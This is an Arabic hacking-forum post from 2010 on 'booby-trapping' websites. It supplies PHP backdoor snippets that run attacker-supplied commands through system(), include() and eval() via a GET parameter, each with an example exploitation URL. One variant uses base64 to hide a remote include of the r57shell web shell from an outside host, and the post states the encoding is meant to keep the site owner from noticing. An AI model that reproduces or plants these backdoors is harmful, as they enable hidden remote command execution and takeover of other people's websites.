اكـاديميـة قـرآصنـه الهكـر [العــربيــه].:.Academy of hacker
نتمني لك قضاء اوقات ممتعه

وتفـيد وتستفيـد

الاداره...


اكـاديـمـيـة الهـكــر العـربــي The first academy 4 hacker Arab
 
الرئيسيةس .و .جبحـثقائمة الاعضاءالمجموعاتالتسجيلدخول

شاطر | 
 

 تلغيـم المـواقـع

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
xt3
Admin


عدد المساهمات : 120
أسعى إلى الإحتراف : 671
الـرتبه : 12
تاريخ التسجيل : 12/04/2010
العمر : 24
الموقع : k3h3.iowoi.org

مُساهمةموضوع: تلغيـم المـواقـع   الخميس أبريل 29, 2010 12:20 am

طبعا الدوال المهمه الذي يستفاد منها هي

include + system + eval

استخدام system
كود PHP:
<?php
if(empty($_GET['tryag'])){
} else {
$m=$_GET['tryag'];
echo system($m) ;
}
?>
الاستغلال للكود :

http://www.web.com/filname.php?tryag=[cmd]
cmd = اوامر لينكس

جاهز سل

استخدام include

كود PHP:
<?php
if(empty($_GET['tryag'])){
} else {
$m=$_GET['tryag'];
print include($m) ;
}
?>
:

http://www.web.com/filname.php?tryag=[shill.txt]
cmd = اوامر لينكس

استخدام eval

طبعا ايفل لها طريقتين وهي تمرير الكود عن طريق تشفير

ASCII-table

وطريقه الاستخدام

كود PHP:
<?php
if(empty($_GET['tryag'])){
} else {
$m=$_GET['tryag'];
eval(stripslashes($m));
}
?>
الاستغلال للكود :

http://www.web.com/filname.php?tryag=[code]
code = هو كود php مشفر عن طريق

ASCII-table

وهذا مثال لفهم الفكره بشكل اوضح

رابط المثال



الطريقه الثانيه وهي استخدام ايفل بدون تشفير

كود PHP:
<?php
if(empty($_GET['tryag'])){
} else {
$m=$_GET['tryag'];
@eval(stripslashes($m));
}
?>
الاستغلال للكود :

http://www.web.com/filname.php?tryag=[code]
code = هو كود php

ومثال اخر

رابط المثال





طبعا احيانا نضطر للتشفير الكود بحيث نصعب المسأله امام صاحب الموقع

وطرق التشفير كثره

وسأستخدم تشفير

Base64



كود PHP:
<?php
if(empty($_GET['tryag'])){
} else {

$m=$_GET['tryag'];
eval(base64_decode('aW5jbHVkZSgiaHR0cDovL3JzdC52b2lkLnJ1L2Rvd25sb2FkL3I1N3NoZWxsLnR4dD8iKTs='));
}
?>
الاستغلال للكود :

http://www.web.com/filname.php?tryag=[cmd]
cmd = اي قيمه

شرح الكود

هو نفس استغلال ايفل ولكن مررنا الكود

php بتشفير

Base64

التشفير

كود PHP:
aW5jbHVkZSgiaHR0cDovL3JzdC52b2lkLnJ1L2Rvd25sb2FkL3I1N3NoZWxsLnR4dD8iKTs=
وفـكه هو

include("http://rst.void.ru/download/r57shell.txt?");
وعند تمرير اي قيمه للمتغير

tryag

سيتم تنفيذ الكود

مثال
رابط المثال


هذا مالدي بهذا الموضوع واتمنى وضع الفائده من الجميع

ملاحظه : يمكن استخدام دوال انشاء ملف والكتابه بداخله

[code]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://k3h3.iowoi.org
 
تلغيـم المـواقـع
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
اكـاديميـة قـرآصنـه الهكـر [العــربيــه].:.Academy of hacker :: ( Hacking & security ) :: [+] إختـراق عشوائي-
انتقل الى: